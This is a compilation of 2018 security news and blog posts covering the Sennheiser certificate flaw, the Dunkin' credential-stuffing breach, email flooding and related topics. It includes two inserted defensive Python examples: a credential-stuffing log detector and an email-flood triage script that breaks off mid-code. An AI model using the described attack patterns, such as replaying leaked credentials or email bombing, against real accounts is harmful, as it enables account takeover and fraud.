The vulnerability in question occurs because the software was installing a root certificate and an encrypted private key to the Trusted Root CA Certificate store. By doing so, a spoofed certificate could be generated and appear as a valid certificate to end users. Connecting to HTTPS sites would still show a secure connection, even though a malicious entity could gain access to any data transmitted.

In HeadSetup and HeadSetup Pro, the vulnerable certificates will no longer be installed. Sennheiser has published a script that will remove affected certificates from affected computers as well as a guide using Active Directory and Group Policy Editor to achieve the same result.



Not unlike Lenovo's Superfish software, Sennheiser's mistake leaves users open to the same type of forgery attack. The main difference, though, is that Sennheiser is not abusing the flaw; it was simply an unknown security issue.

To make matters worse, browsers such as Google Chrome will not detect forged certificates that are linked with correctly installed root certificates. Certificate pinning is a known type of attack that is mitigated by modern browsers, but does not work in this case because the chain of trust does not appear broken at any step.

Both Windows and macOS users are believed to be affected by the issue, but the solutions are already available. If using Sennheiser's HeadSetup or HeadSetup Pro software, update it immediately to the latest version.

Compliance is not Security


Many folks get confused about the difference between security and compliance. Many, especially those less technically inclined, assume that fulfilling compliance obligations sufficiently addresses security. Unfortunately, that’s not true as demonstrated by the continuing rise of security breaches each year. In this post, I’ll briefly explain the difference between security and compliance, and then outline several specific steps companies can take to get moving on security.

Security is about minimizing risk. For companies that invest in security controls and resources, the goal of those investments is to minimize the likelihood of an attack, the potential success for an attack, and the ultimate impact of a successful attack. Sometimes those investments pay off, but other times they are not enough and attackers get in anyway.

Compliance is just one piece of that security puzzle. The goal of compliance efforts is to minimize the risk to the organization from regulatory and contractual authorities. Hopefully, those compliance requirements are built on well-founded security principles so that in the process of complying, the business is also becoming more secure. But that’s not always the case. Often compliance requirements are too vague to be effectual, and other times they are too specific to be practical. Unfortunately, that means that just checking off compliance boxes does not necessarily make you more secure.

Most organizations are required to address a wide range of compliance obligations. Many of these are required by federal law such as HIPAA and Sarbanes Oxley. State-based requirements also get thrown in, such as the CyberSecurity regulations passed last year by the New York Department of Financial Services. And then there are contractual requirements built into legal agreements such as PCI and others. All of these present risk to the organization if not appropriately addressed, but ultimately the primary focus of each is to satisfy an auditor rather than to stop an attacker.

Regardless of where you are in your security journey, there are several key things you should be doing. Every organization has a responsibility to protect its assets.

Make a plan & move forward

It’s easy to get overwhelmed by security issues and default to doing nothing, but the first step is always to do something. If you don’t have a plan, make a plan. Even if you don’t know where to start, schedule a meeting with other stakeholders with the goal of figuring out your plan. If you’re a small business that has never thought about security before, then it might take a while to make significant progress, but you have to start with a plan.

Use a framework

A comprehensive security program requires balancing a lot of different pieces and it’s easy to miss some aspects. It’s often helpful to use a security framework to assess your progress and help focus your direction. There are a lot of great resources available to help folks get started. Here are just a few examples:

PCI DSS: https://www.pcisecuritystandards.org/
NIST Cybersecurity Framework: https://www.nist.gov/cyberframework
CIS 20 Critical Controls: https://www.cisecurity.org/controls/

Invest in the right people

A strong and active security program requires the direction of experienced and well-trained professionals. Whether you utilize internal resources or coordinate with 3rd party service providers, it’s critical that you find the right people for the job. In other areas of your business, an ineffective professional may fail to meet deadlines or close deals. But, if your security team isn’t up to the task, that may not become obvious until after a security breach occurs.

Allocate the necessary resources

Good security has significant costs, in both monetary terms and often in the hassle that comes with modified business practices. To get serious about security, executives have to set the priority from the top down and empower their people to do the job. Full support from management is an absolutely critical component of every security program.

Assess your controls

Most businesses recognize the value & necessity of auditing. While we expect employees and technologies to perform perfectly, that never quite happens in the real world. Likewise, in security it’s critical that you constantly assess your security controls to validate that they are performing as expected to protect against the constantly-changing threats.

This brief list is not exhaustive at all, but hopefully, it will provide some guidance on moving your security program to the next level. If you have questions about how to get started or need more guidance, please let us know.

Nathan Sweaney is a Senior Security Consultant with Secure Ideas. If you need help analyzing your security needs or have questions about compliance you can contact him at nathan@secureideas.com, on Twitter @sweaney, or visit the Secure Ideas Professionally Evil site for services provided.

Commit your node modules


The latest NPM dependency fiasco has got me thinking again about dependency management. While this used to be a discussion that was limited to those of us who create Node apps, these days, with popular frontend frameworks like React, it’s rare to find a modern web application that doesn’t use NPM in some capacity.

For almost a decade I have stood firmly on the side that you should define your dependencies in your package.json and trust the magic of semantic versioning. I believed this was truly the best way to ensure you always had the latest security patches and performance improvements for the modules your application depends on. I fought this fight with my teams, colleagues, and peers. Even when left-pad broke the internet I stood my ground.

This latest issue gives me a chance to revisit my thinking and I have to admit I have changed my mind. The time has come, I give in. You should commit your Node modules to your source control repository. There I said it. I feel better.

While for a long time I felt like, in addition to the arguments I mentioned above, by taking the package.json stance, I was somehow defending a core belief of the Node community, but the truth is the Node community threw the towel in on this fight a while ago.

First there was npm shrinkwrap, then the folks at Facebook came up with yarn. Finally NPM introduced package-lock and version locking your dependency tree became part of the Node gospel.

While the debate is definitely still raging about whether or not you should lock your dependencies, and there are a ton of people who know a lot more package management than I do, I am just going to assume that ship has sailed and we now live in a world of dependency locking.

Since we are already version locking our dependencies the only question that’s left is should we keep downloading those dependencies from NPM every time we build? At this point I just don’t see the benefit. At Convox, when we work with people to help speed up Docker builds more often than not what we see are thousands of lines, and many minutes, of NPM install messages. Why not just commit our Node modules and save that entire build step, not to mention avoiding the potential risk of an NPM outage or security breach.

Another way to look at it is: what’s the downside to committing our Node modules? Sure, you slightly increase the size of your source code repository, but is that really an issue? Unless you are operating at Facebook scale, I doubt this will have an impact on your team. Otherwise it seems like it’s all upside to me. The one warning I will give is really more about version locking. You do have to remember to periodically review and upgrade the Node modules that you are using to ensure you are gaining the benefits of security fixes etc., but you will no longer have to worry about a Node module breaking or being unpublished when you are in the middle of trying to get a production build live. One note is that GitHub Security Alerts are really good at catching security issues, so make sure you set them up for your repositories. So commit away, it’s the smart thing to do!

Now that you have an application that builds super quickly, we would love to help you get it into production, so check out Convox when you get the chance!

Venafi Secures $100M Financing Round Led by TCV


New funding to accelerate growth and support new Machine Identity Protection Development Fund


SALT LAKE CITY, November 29, 2018: Venafi, the leading provider of machine identity protection, today announced the closing of a $100 million round of financing, led by TCV with additional participation from existing investors QuestMark Partners and NextEquity Partners. TCV is one of the largest and most respected providers of capital to growth-stage private and public companies in the technology industry and has backed industry-leading companies, including Airbnb, Alarm.com, Cradlepoint, Genesys, Netflix, Rapid7, Silver Peak, Splunk, Spotify and Zillow. As part of the transaction, TCV general partner Jake Reynolds joins Venafi’s board of directors.

The funding will be used to accelerate Venafi’s growth and to cement the firm’s growing market leadership. In addition to fueling growth, $12.5 million of the investment will be made available to third-party developers in the first tranche of the new Machine Identity Protection Development Fund. Venafi created the fund to accelerate the integration of machine identity intelligence into a wide range of machines in the enterprise and further enhance and expand the machine identity ecosystem. The fund will allow developers, including consultancies, systems integrators, fast-moving startups, open source developers and cybersecurity vendors to apply for sponsorship. This sponsorship will allow recipients to build integrations that deliver greater visibility, intelligence and automation for Venafi customers across any technology that creates or consumes machine identities.

“Identity is the foundation of security,” said Jeff Hudson, CEO of Venafi. “The cyber world is made up of machines, and all machines require identities for the cyber world to be secure. As a society, we understand the risks associated with human identity theft very well, and we spend over $8 billion per year protecting human identities. However, most organizations don’t yet understand the risks associated with machine identities and, as a result, spend almost nothing to protect them. This leaves our global digital economy at risk. TCV has a long history of partnering with the world’s leading technology firms, so we’re very excited about the opportunity to work with them. Their investment and expertise will help us ensure that the world’s machines, including hardware and software from smart machines, virtual servers, applications, containers, and more, are connected, safe and secure.”

Just as usernames and passwords are used to identify and authenticate humans, machine identities enable the trusted relationships between machines that control the flow of sensitive data. Because machine identities are poorly understood and often unprotected, they are subject to being exploited by cybercriminals. The Venafi platform protects the machine identities whose underlying technology is cryptographic keys and digital certificates by providing unparalleled visibility, intelligence and automation.

“The team at TCV is excited about our partnership with Venafi,” said Jake Reynolds, general partner at TCV. “DevOps and IoT are driving growth in the number of machines thanks to cloud computing, virtualization, and the proliferation of connected devices. Venafi is well-positioned to provide the machine identity protection for all enterprise machines, and we look forward to supporting the Venafi team as they continue to scale in this rapidly expanding market.”

With over 30 patents, Venafi delivers innovative machine identity protection solutions for the world’s most demanding, security-conscious Global 5000 organizations, including the top five U.S. health insurers; the top five U.S. airlines; four of the top five U.S. retailers; and four of the top five banks in each of the following countries: U.S., U.K., Australia and South Africa.

About Venafi

Venafi is the inventor and cybersecurity market leader in machine identity protection, securing connections and communications between machines. Venafi protects machine identity types by orchestrating cryptographic keys and digital certificates for SSL/TLS, IoT, mobile and SSH. Venafi provides global visibility of machine identities and the risks associated with them for the extended enterprise―on premises, mobile, virtual, cloud and IoT―at machine speed and scale. Venafi puts this intelligence into action with automated remediation that reduces the security and availability risks connected with weak or compromised machine identities while safeguarding the flow of information to trusted machines and preventing communication with untrusted machines.

For more information, visit: www.venafi.com.

About TCV

Founded in 1995, TCV provides capital to growth-stage private and public companies in the technology industry. Since inception, TCV has invested over $10 billion in leading technology companies and has helped guide CEOs through more than 115 IPOs and strategic acquisitions. TCV’s investments include Airbnb, Altiris, AxiomSL, Dollar Shave Club, EmbanetCompass, EtQ, ExactTarget, Expedia, Facebook, Fandango, GoDaddy, HomeAway, LinkedIn, Netflix, OSIsoft, Rent the Runway, Sitecore, Splunk, Spotify, Varsity Tutors, and Zillow. TCV is headquartered in Menlo Park, California, with offices in New York and London. For more information about TCV, including a complete list of TCV investments, visit https://www.tcv.com/.

Huawei asks New Zealand to explain latest ‘national security’ 5G ban


Less than a month after Huawei narrowed its 5G ambitions in New Zealand by offering to supply carrier Spark with basic 5G radio transmitters rather than “core” networking hardware, New Zealand has blocked the company’s bid on national security grounds ― but left the door open for further discussion. Now Huawei is attempting to determine what led to the decision, which comes after the U.S. and Australia more comprehensively banned Huawei 5G networking gear.

New Zealand’s decision to stop Spark from using Huawei 5G hardware appears to be narrower and different than other countries’ bans, though its rationale is presently somewhat cloudy. Speaking on national radio, New Zealand’s Government Communications Security Bureau (GCSB) minister Andrew Little specifically downplayed the suggestion that the decision was an issue with China, or Huawei in particular.

“It’s not about the country, it’s not even particularly about the company, it’s about the technology that is proposed,” Little said (via ChannelNewsAsia). “I can say with considerable confidence that there’s been no representations made to the GCSB from Australia, from the United States, from anywhere, about how it should go about making its decision.”

New Zealand is proceeding cautiously with its decision, as it depends heavily upon its economic relationship with China ― Huawei’s largest supporter. The countries do around $18 billion in annual import-export business, enough to make China the smaller country’s largest trading partner. By comparison, the United States and China exchange around $3.5 trillion in goods each year, but the U.S. is currently treating the relationship as adversarial, and lobbying multiple countries to avoid Huawei products.

Though Little cited “classified information” in refusing to discuss the country’s specific national security concerns, the issue appears to be the potential for disruption of core network functionality by radio hardware at the 5G network’s edge. While Spark proposed to use Huawei gear solely for radio transmissions at its network’s edge, there are concerns that edge hardware will play a larger role in the 5G era than in 3G and 4G networks, and possibly jeopardize overall network security.

Rather than blocking Huawei altogether, New Zealand directed Spark to consult the GCSB to see if there was a way to reduce risks of working with the company ― a measure that Huawei now seeks to understand. According to Reuters, Huawei’s New Zealand office is urgently seeking a meeting with the government, saying that it would “welcome the opportunity to actively address any concerns and work together to find a way forward.”

Against Security Token Standards

Recently I was speaking about the future of security tokens at a blockchain conference in Europe. During one of the satellite receptions to the event, I was approached by a prominent figure in the crypto world who apparently had been reading some articles about security tokens and had developed some very interesting theses about the evolution of the space. A technologist by background, this person was struggling to reconcile the computer science-centric methods of the blockchain space with the semi-centralized, red-tape-first approaches that he is seeing in the security token market (I have the same problem, BTW). At some point during our conversation he bluntly asked me: “There is one thing that I still can’t understand about the security token community: What’s the obsession with standards? Isn’t that a bunch of [bleep bleep] at this point [bleep bleep bleep…]?”

The subject of standards in the security token space might be a sensitive one. Obviously, there is a segment of the community that believes in the need for standardization. I tend to subscribe to a different thesis. The security token space is too nascent, it is still missing 99% of the infrastructure required to be a relevant vehicle for securities, and there are simply not enough security tokens issued to make a statistically significant sample. At this stage, standards act more like a constraining force than a vehicle for innovation. At this point, we simply don’t know enough about how security tokens are going to evolve, and we certainly haven’t encountered any challenges that require standardization. In my opinion, “standards without applications are figments of hallucination.”

The Wrong and Right Way to Think About Standards

Technological history shows us that the best standards evolve from innovation and competition between market participants. The goal of standards is to solve interoperability and portability challenges that can streamline the adoption of a technology segment. Unfortunately, many times standards become a vehicle for bureaucracy and for technology vendors to project fake thought leadership positions by creating the “rules of the game”.

To illustrate this point, let’s take two examples of different approaches to standardization in recent technology movements.

The Wrong Way to Standards: Service Oriented Architectures

A few years ago, service oriented architecture (SOA) was positioned as an architecture style that could finally solve interoperability between systems in the enterprise by using an artifact known as web services. From the get-go, SOA triggered an intense rivalry between technology incumbents like Microsoft, IBM, Oracle, Tibco, SAP and many others. Even before SOA had achieved any meaningful traction, the vendors established two standards known as the Simple Object Access Protocol (which was neither simple nor a protocol) and the Web Service Description Language (WSDL). That was just the beginning: committees in organizations like W3C and OASIS started pushing new web services standards for every single aspect, from basic communication to sophisticated security. The WS-* protocols introduced incredible levels of complexity, to the point that it was impossible for their own creators to implement them. The end result was that the entire industry shifted to simpler approaches like representational state transfer (REST), which rely on universal internet protocols such as HTTP instead of committee-designed standards.

The Right Way to Standards: The Browser Wars

A great example of how standards should evolve organically from competition is the browser you are using to read this blog. For decades, browsers have been at the center of intense battles between companies such as Microsoft, Netscape, Opera, Google, Apple and many others. The intense innovation has caused consumers to use different browsers, forcing the need for interoperability. As a result, the best technologies in the space, such as HTML5 or Google’s V8, became widely adopted within the entire ecosystem.

Standards and SecurityTokens

Bringing some of the lessons from key technology movements into security tokens, we can identify some of the core principles behind good and bad standardization.


In the context of security tokens, standards should focus less on the structure of the tokens and more on the areas of the market that require interactions between different participants. Here are five examples of areas that I think are better suited for standardization than others:


Integration with Exchanges: Aspects such as listing, transferring and notifications are good candidates for standardization as they require interoperability between different players. Additionally, security token exchanges are building on years of research in crypto-exchanges, which makes this a somewhat more mature scenario for adopting standards.

Disclosures: Protocols for publishing and disclosing material public information about security tokens are another area in which standards can be relevant. Universal protocols for disclosures that can be integrated into exchanges or token issuance platforms are desperately needed in the security token space.

On-Chain Compliance: I believe many regulatory aspects of security tokens will be expressed in some form of on-chain protocol and smart contracts. Given the extensive regulatory knowledge in financial markets, this can be another solid area for standardization.

Liquidity: Arguably the biggest challenge in the security token market, liquidity mechanics must be somewhat present at the protocol level and not rely solely on market interactions. Some of the ideas from protocols like Bancor can be adapted to security tokens in the form of standards that can be incorporated at the token and exchange level.

Ownership: Security tokens are ultimately about expressing ownership claims. While the blockchain provides all the necessary building blocks for expressing legally-viable ownership constructs, standards in this area might help to streamline the adoption of security tokens.

Other areas such as privacy, dividend distribution or governance are likely to become relevant in terms of security token standards as the space evolves.

The subject of standards is likely to continue being a passionate area of debate in the security token space. If the security token market is successful, standards will evolve organically and the areas of standardization will become painfully visible. At this moment, we don’t need standards, we need more and better security tokens. After all, a security token standard that hasn’t been implemented in any security tokens is the definition of an oxymoron.


Hackers Breach Dunkin’ Donuts Accounts in Credential Stuffing Attack


A credential stuffing attack has allowed hackers to take a big bite out of Dunkin’ Donuts customer data. The donut giant announced Tuesday evening that a data breach in October may have led to customers’ personal information being compromised.

Dunkin’ Brands Inc. in an advisory posted to its website said that on Oct. 31, a malicious actor attempted to access customers’ first and last names, email address, as well as account information for DD Perks, Dunkin’ Donuts’ rewards program. That account info includes customers’ 16-digit DD Perks account number and DD Perks QR code. Dunkin’ Donuts has forced a password reset that required all of the potentially impacted DD Perks account holders to log out and log back in to their account using a new password.


The company said that it believes the hacker obtained usernames and passwords from security breaches of other companies, and then used those usernames and passwords to try to break in to various online accounts via widespread automated login requests, a method also known as credential stuffing.

“Although Dunkin’ did not experience a data security breach involving its internal systems, we’ve been informed that third-parties obtained usernames and passwords through other companies’ security breaches and used this information to log into some Dunkin’ DD Perks accounts,” the company said in its statement.

Dunkin’ Donuts said its security vendor was successful in stopping most of these attempts, but it is possible still that the hacker may have succeeded in logging in to some DD Perks accounts.

Credential stuffing is affordable and seamless, making it attractive for hackers to carry out. In fact, NuData Security, a Mastercard Company, has found that 90 percent of cyberattacks start with some sort of automation, with credential stuffing being a prominent one, like the one perpetrated on Dunkin’ Donuts.

“The software for credential stuffing is now so affordable that this type of attack is becoming accessible for almost anyone,” Ryan Wilk, VP of customer success for NuData Security, said in an email.

The incident points to the need for basic password security hygiene, specifically the need for users to use different passwords for different accounts.

Wilk said that merely forcing customers to change their passwords is not entirely effective.

“Having customers change their passwords is a temporary fix, a band-aid that doesn’t get to the root of the problem,” he said. “One effective way to stop this type of attack is to implement security solutions that detect this sophisticated automated activity at login and other placements. By using technologies that include behavioral biometrics, automated activity is flagged at login before it can even test any credentials in the company’s environment.”
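A detection heuristic for the pattern the article describes, written here as an added example and not taken from Dunkin’ or NuData: one source address replaying many distinct username/password pairs from a leaked list, each tried only once or twice, so per-account lockout never fires. The log format, the field names and the thresholds are assumptions, and the log lines are constructed.

```python
"""Flag credential-stuffing patterns in web login logs.

Heuristic: a single source address attempts logins for many *distinct*
usernames inside a short window with a high failure rate. This differs from
brute force against one account (many attempts, one username) and from a
user mistyping a password (few attempts, one username).
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample, not a real log. Assumed format: ISO time, ip, user, result.
SAMPLE_LOG = """\
2018-10-31T02:14:01Z ip=198.51.100.7 user=alice result=FAIL
2018-10-31T02:14:02Z ip=198.51.100.7 user=bob result=FAIL
2018-10-31T02:14:02Z ip=198.51.100.7 user=carol result=FAIL
2018-10-31T02:14:03Z ip=198.51.100.7 user=dave result=SUCCESS
2018-10-31T02:14:03Z ip=198.51.100.7 user=erin result=FAIL
2018-10-31T02:14:04Z ip=198.51.100.7 user=frank result=FAIL
2018-10-31T02:14:05Z ip=198.51.100.7 user=grace result=FAIL
2018-10-31T02:14:05Z ip=198.51.100.7 user=heidi result=FAIL
2018-10-31T02:14:06Z ip=198.51.100.7 user=ivan result=FAIL
2018-10-31T02:14:06Z ip=198.51.100.7 user=judy result=SUCCESS
2018-10-31T02:14:10Z ip=203.0.113.9 user=mallory result=FAIL
2018-10-31T02:14:40Z ip=203.0.113.9 user=mallory result=FAIL
2018-10-31T02:15:10Z ip=203.0.113.9 user=mallory result=SUCCESS
2018-10-31T02:20:00Z ip=192.0.2.44 user=oscar result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$"
)


def parse(log_text):
    """Turn log text into (timestamp, ip, user, success) tuples, skipping
    malformed lines instead of aborting on them."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["ip"], m["user"], m["result"] == "SUCCESS"))
    return events


def detect_stuffing(events, window=timedelta(minutes=5),
                    min_users=8, max_success_ratio=0.5):
    """Return {ip: sorted usernames that logged in successfully from that ip}
    for every source whose traffic looks like a replayed credential list.

    The success list is the actionable output: those are the accounts that
    need a forced password reset, as Dunkin' did for affected DD Perks users.
    """
    by_ip = defaultdict(list)
    for ts, ip, user, ok in events:
        by_ip[ip].append((ts, user, ok))

    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        # Sliding window over this source's attempts, oldest to newest.
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            win = attempts[start:end + 1]
            users = {u for _, u, _ in win}
            successes = sum(1 for _, _, ok in win if ok)
            if len(users) >= min_users and successes / len(win) <= max_success_ratio:
                flagged[ip] = sorted(u for _, u, ok in attempts if ok)
                break
    return flagged


if __name__ == "__main__":
    for ip, accounts in detect_stuffing(parse(SAMPLE_LOG)).items():
        print(f"{ip}: stuffing pattern; reset accounts {accounts}")
```

In the sample, only 198.51.100.7 is flagged (ten usernames in five seconds, two of them successful); the repeated failures from 203.0.113.9 against a single account are left to ordinary per-account lockout logic.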

The incident is the second notable data breach of a company this week. On Wednesday, Dell EMC warned customers of unauthorized activity on its network that occurred on Nov. 9, when it believes adversaries attempted to access names, email addresses and hashed passwords.

2019 Predictions: Will Cyber Serenity Soon Be a Thing of the Past?


In 2018 the threat landscape evolved at a breakneck pace, from predominantly DDoS and ransom attacks (in 2016 and 2017, respectively), to automated attacks. We saw sensational attacks on APIs, the ability to leverage weaponized Artificial Intelligence, and growth in side-channel and proxy-based attacks.

And by the looks of it, 2019 will be an extension of the proverbial game of whack-a-mole, with categorical alterations to the current tactics, techniques and procedures (TTPs). While nobody knows exactly what the future holds, strong indicators today enable us to forecast trends in the coming year.

The public cloud will experience a massive security attack

The worldwide public cloud services market is projected to grow 17.3 percent in 2019 to total $206.2 billion, up from $175.8 billion in 2018, according to Gartner, Inc. This means organizations are rapidly shifting content to the cloud, and with that data shift comes new vulnerabilities and threats. While cloud adoption is touted as faster, better, and easier, security is often overlooked for performance and overall cost. Organizations trust and expect their cloud providers to adequately secure information for them, but perception is not always a reality when it comes to current cloud security, and 2019 will demonstrate this.

Ransom techniques will surge

Ransom, including ransomware and ransom RDoS, will give way to hijacking new embedded technologies, along with holding healthcare systems and smart cities hostage with the launch of 5G networks and devices. What does this look like? The prospects are distressing:

Hijacking the availability of a service―like stock trading, streaming video or music, or even 911―and demanding a ransom for the digital return of the devices or network.

Hijacking a device. Not only are smart home devices like thermostats and refrigerators susceptible to security lapses, but so are larger devices, like automobiles.

Healthcare ransom attacks pose a particularly terrifying threat. As healthcare is increasingly interwoven with cloud-based monitoring, services and IoT embedded devices responsible for administering health management (think prescriptions/urgent medications, health records, etc.) are vulnerable, putting those seeking medical care in jeopardy of having the healthcare devices they are dependent on targeted by malware, or the network supporting those devices hijacked.

Nation state attacks will increase

As trade and other types of “soft-based’ power conflicts increase in number and severity, nation states and other groups will seek new ways of causing widespread disruption including Internet outages at the local or regional level, service outages, supply chain attacks and application blacklisting by government in attempted power grabs. Contractors and government organizations are likely to be targeted, and other industries will stand to lose millions of dollars as indirect victims if communications systems fail and trade grinds to a halt.

More destructive DDoS attacks are on the way

Over the past several years, we’ve witnessed the development and deployment of massive IoT-based botnets, such as Mirai, Brickerbot, Reaper and Hajime, whose systems are built around thousands of compromised IoT devices. Most of these weaponized botnets have been used in cyberattacks to knock out critical devices or services in a relatively straightforward manner.

Recently there has been a change in devices targeted by bot herders. Based on developments we are seeing in the wild, attackers are not only infiltrating resource-constrained IoT devices, they are also targeting powerful cloud-based servers. When targeted, only a handful of compromised instances are needed to create a serious threat. Since IoT malware is cross-compiled for many platforms, including x86_64, we expect to see attackers consistently altering and updating Mirai/Qbot scanners to include more cloud-based exploits going into 2019.

Cyber serenity may be a thing of the past

If the growth of the attack landscape continues to evolve into 2019 through various chaining attacks and alteration of the current TTPs to include automated features, the best years of cybersecurity may be behind us. Let’s hope that 2019 will be the year we collectively begin to really share intelligence and aid one another in knowledge transfer; it’s critical in order to address the threat equation and come up with reasonable and achievable solutions that will abate the ominous signs before us all.

Until then, pay special attention to weaponized AI, large API attacks, proxy attacks and automated social engineering. As they target the hidden attack surface of automation, they will no doubt become very problematic moving forward.


Read the “2018 C-Suite Perspectives: Trends in the Cyberattack Landscape, Security Threats and Business Impacts” to learn more.


Detectify security updates for 29 November


For continuous coverage, we push out major Detectify security updates every two weeks, keeping our tool up-to-date with new findings, features and improvements sourced from our security researchers and Crowdsource ethical hacker community. Due to confidentiality agreements, we cannot publicize all security update releases here, but they are immediately added to our scanner and available to all users. This post highlights a few things that we have improved in the last two weeks.

The following are some of the security vulnerabilities reported by Detectify Crowdsource ethical hackers. We added these tests to the Detectify scanner tool on 29 November.

WordPress wp-backup-plus Database Disclosure

Yet another WordPress plugin that publishes the whole backup, available for anyone to download. This continues to be a problem and shows the importance of disabling directory listing.

jQuery-File-Upload ImageTragick RCE

jQuery-File-Upload continues to be mentioned in security update after security update, and we still get Crowdsource submissions on different ways it can be used to exploit a system. We are looking forward to a more elaborate write-up in the future.

Microsoft Thumbs.db Exposure

It is commonly known that Mac OS saves a file called .DS_Store in each directory that contains a list of all files in that directory. However, as you do not by default actually see that file when using Mac OS itself, it is common for people to accidentally upload this file to websites when they upload a whole folder.

Less known, although far from a secret, is that Windows actually has something similar called Thumbs.db. The file works in the same way and stores a thumbnail of all images in a directory, and people accidentally upload it in the same way. Read more here: https://github.com/thinkski/vinetto

Struts

For this release, our own security researchers spent some time fiddling around with Struts, implementing a lot of existing vulnerabilities and ensuring all the tests work as they should.

Questions or comments on our latest security updates? Let us know in the section below.

Begin a scan for the latest vulnerabilities today. Start a free trial with Detectify here!

Already have an account? Login to check your assets.

Detectify is a continuous web scanning and monitoring service that can be set up for automated scanning for 1000+ known vulnerabilities, including the OWASP Top 10. Check for the latest vulnerabilities!

Tougher Privacy Laws


I am all for tougher privacy laws, especially for companies that have not followed basic security practices for securing data. There is a proposal from US Senator Ron Wyden that would increase penalties and give more rights to consumers. Consumers could opt out of data sharing and executives could be fined or jailed. The penalties are stiff, and I think it’s not likely to pass, and more practically, many of the penalties might not actually get enforced.

In the US we don’t have much in the way of rights over our own data as humans. Companies, for the most part, have complete control over the data they collect about us and can re-use, sell, share, etc. that data in any way they wish. There are some laws concerning notifications of data loss, and some penalties in California’s recent law, but for most of the country, consumers are at the mercy of organizations. I’d like that to change, and I don’t think doing so would hurt most businesses. Aggregators and data only companies might struggle, but I’d like to see less of those companies in business.

Stronger penalties might stimulate change and better practices, but only if we fine or jail those that limit security efforts. Most technical people try to implement security but are often prevented or limited from making many changes when there is pressure to keep moving forward. Certainly some technical people don’t take security seriously, but I’d like to see employees absolved of responsibility if they show that they have asked for time or resources for security, but those aren’t granted. I’d also like to see some way for management at all levels to prove they have actually requested and funded security efforts, not just remain ignorant of the lack of security. Too many layers of management muddy the waters and often prevent those that are responsible for pushing other work over security from being held accountable. We need more accountability at all levels for poor security.

Likely there is a limited amount of structure that government can provide. Developers and infrastructure groups need to build and configure secure systems. Some funding needs to be available for security work, along with the time to do better. Management needs to make security a priority. It’s a group effort, and while I hope we can get there, I’m not terribly confident things will improve soon.

Steve Jones

The Voice of the DBA Podcast

Listen to the MP3 Audio (3.4MB) podcast or subscribe to the feed at iTunes and Libsyn.

The Return of Email Flooding


An old attack technique is making its way back into the mainstream with an onslaught of messages that legacy tools and script writing can't easily detect.

Imagine your inbox receiving 15,000 messages over the course of just a few days. What would certainly be an extreme nuisance could also translate into a huge productivity and operations liability, taking days or even weeks to return your primary method of communications back to normal.

Known as email flooding, this easy-to-implement technique is re-emerging among attackers for two primary reasons: to deliver the messages and demands of hacktivists, and as a diversionary tactic to help perpetrate financial or operational fraud.

A Tsunami of Emails

Also known as subscription bombing or email bombing, email flooding dates back to the late 1990s, when attackers automated programs to scan the web for sign-up forms and insert the addresses of those being targeted into numerous subscription forms. The targeted addresses would subsequently receive thousands of emails in a short period of time, often disabling the account.

Such attacks have been used in the past for harassment or for political purposes. One of the first noted instances was in 1996, when a stockbroker in San Francisco was bombarded with a flood of 25,000 emails that prevented him from using his computer.

Symantec argues that such attacks are almost impossible to prevent because they come from legitimate email accounts, and most major mail servers don't even pick them up in spam filters. The attacks can also be carried out automatically with simple scripts at registration forms that aren't protected by CAPTCHA or opt-in email. Today, sophisticated landing pages are built to continuously send automated messages to any valid email address.

A Smokescreen for Fraudulent Transactions

Email bombs are also still used as a means of harassment. In August 2017, an email bomb shut down ProPublica's email for a day, and secure email provider Tutanota was recently hit with a massive bomb that sent 500,000 newsletters to one of its mailboxes. At best, these attacks are a nuisance. But at their worst, they can cripple networks, shutter operations, and lead to a loss of productivity and revenue.

In addition to hacktivism, email flooding is now being used as a smokescreen for more dangerous phishing techniques such as business email compromise, spearphishing and malware. Criminals use the email flood to distract victims and to exhaust security resources while they perpetrate fraudulent transactions. By the time the targeted person or organization clears the clutter and discovers the legitimate emails notifying them of account changes or suspicious activity, the attackers have made off with the funds.

The end-of-year global security report by AppRiver noted that cybercriminals are increasingly using this so-called "distributed spam distraction" (or DSD) to disguise fraud in real time. The attacks include email subscriptions and text-only messages that bombard the account for a period of 12 to 24 hours, then abruptly end after the real crime has been completed. Email bombs are not only effective but cheap and simple to orchestrate. Services on the Dark Web now enable anyone to bomb an email account with 5,000 messages for as little as $20.

The Underlying Need: A Comprehensive Email Strategy

With all types of phishing attacks increasing in frequency and sophistication, many organizations are hardening their email security posture at both the server and the mailbox. This is especially important to stop email flooding, as traditional email safeguards such as secure email gateways and phishing awareness training are not built to mitigate this technique.

Currently, organizations trying to remediate an email flooding attack are asking IT to create scripts and tools to counter the influx of emails that come in bulk or intermittently. While correct in theory, this approach is time consuming and there is no guarantee that it will work. A paper at the Anti-Phishing Working Group noted that one of the most effective measures against email flooding is a layered approach toward detection and throttling through volume and time-based methodologies with phrasal pattern recognition. Authors of the paper said a combination of user email behavior profiling and anomaly detection can better help identify the start of a bombing attack.

This early detection can enable users to maintain functionality of the inbox by limiting new messages and allowing expected messages to come through. In many cases, it may buy just enough time to enable the user or the security operations center team to prevent a wire transfer.
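The layered approach described above, as an added example that is not from the article or the APWG paper it cites: a per-mailbox volume baseline to spot the onset of a flood, then sender-history profiling and subscription-phrase matching to keep expected mail (here, a bank’s wire-transfer notice) flowing while the bulk is held. The baseline numbers, the known-sender set, the phrase list and all messages are constructed.

```python
"""Detect an e-mail flood against one mailbox and triage inbound messages.

Layer 1 (volume/time): compare the message count in the trailing window
with a threshold learned from the mailbox's normal hourly volume.
Layer 2 (profiling + phrasal patterns): while the rate is anomalous,
deliver mail from senders the user has a history with, and hold messages
that match subscription-confirmation phrasing or come from unknown senders.
Held mail is queued for review, not dropped, since wanted mail may be in it.
"""
from datetime import datetime, timedelta
import re
import statistics

# Constructed baseline: inbound messages per hour for this mailbox on quiet days.
BASELINE_PER_HOUR = [3, 5, 4, 6, 2, 5, 4, 3, 7, 4, 5, 3]

# Constructed correspondent set, e.g. harvested from the user's sent folder.
KNOWN_SENDERS = {"cfo@example.com", "alerts@bank.example", "teammate@example.com"}

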